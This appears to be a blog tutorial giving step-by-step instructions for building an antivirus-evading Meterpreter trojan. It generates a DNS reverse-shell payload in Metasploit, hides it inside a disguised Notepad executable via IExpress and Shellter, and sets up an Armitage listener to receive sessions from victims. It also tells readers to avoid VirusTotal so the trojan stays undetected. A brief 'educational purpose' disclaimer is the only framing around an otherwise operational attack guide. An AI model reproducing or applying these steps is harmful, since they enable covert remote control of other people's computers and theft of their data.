Cyber Security, Linux

Create an Untraceable Trojan Using a Domain Name

Create an Untraceable Trojan Using a Domain Name

In this tutorial I am going to show you how to create an untraceable Meterpreter Trojan using a Domain name. I have taken a few guides/tutorials and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable File. Part 3 is using both in Shellter to create your Untraceable Trojan. Part 4 is setting up your Listener using Armitage.

Things & Software You Will Need:

  • Kali Linux (Linux Distro)
  • Windows (Microsoft)
  • A No IP account with a domain name
  • A forwarded port on your router
  • Shellter Software

Disclaimer: This and all the tutorials here at TechLinu.com are solely for educational purpose, we are not responsible for any data loss or damage caused. Use it at your own risk.

Part 1: Creating the DNS Payload

Using Kali Linux OS:

Open Metasploit on Kali Linux by typing msfconsole in a terminal.

Type use payload/windows/meterpreter/reverse_tcp_dns.

Type show options. This will show you that you need to set your lhost and lport.

Type set lhost (hostname you created, without http://).

Type set lport (port you have forwarded on your router set for the Kali machine).

Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.

Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw

Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).

Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).

Part 2: Creating the Executable File in Windows

Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).

  • 32-bit Windows – Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
  • 64-bit Windows – Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)

Choose Create new Self Extraction Directive File and click next.

Click next on the Package Purpose page.

Type the title of the package. (This can be anything you want) Fore Ex: Notepad.exe

No Prompt, click next.

Do not display a license. Click next.

Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.

Click the drop arrow and choose the file name you choose on the last screen. Click Next.

Choose Hidden and then click next.

No Message. Click Next

Click Browse and type a name for your malware file and a destination target. Check the Hide File Extracting Progress Animation from user. Click Next.

Select No restart and then click next.

You can then either choose to save the self extraction directive or don’t save. Click Next.

Click Next again on the create Package. Then click Finish.

Part 3: Using Both Created Files in Shellter to Create Your Trojan

Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.

  • Type A for Auto.
  • Type N for No.

Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do it’s thing for 30 seconds to a minute.

When asked to choose payload, type C for custom.

Type the location of your created payload in Part 1 and hit enter.

Type N for No reflective DLL loader.

Hit enter and let Shellter finish doing it’s thing If it says Injection Verified! you should have a working undetectable Trojan.

Hit enter to exit Shellter.

Part 4: Set Up Your Listener

You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.

Switch back to Kali Linux.

Open Terminal and type Msfupdate

Once it’s done type apt-get install armitage.

Type msfdb init

Open Armitage

Click Connect

Click Yes

Once Armitage opens type: use exploit/multi/handler

Type set lhost 0.0.0.0

Type set lport (your port you forwarded in your router)

Type set payload windows/meterpreter/reverse tcp dns

Type set exitonsession false

(Optional.) Type set autorunscript migrate -f

(Optional.) Type set prependmigrate True

Type exploit -j

(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)

Now you should be able to run your undetectable Trojan and get a Meterpreter session.

DO NOT Upload your created Executable to online sites such as Virus Total.

Create an Untraceable Trojan Using a Domain Name

Previous ArticleNext Article

TechLinu.com – is a computer & technology resource website. TechLinu provides up to date tutorials on computers, smartphone, games, cyber security, internet, programming, Linux, windows and how to blog and make money online.

4 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

TechLinu - Everyday Tech app is updated to version 2. Download the new app here:Get App
+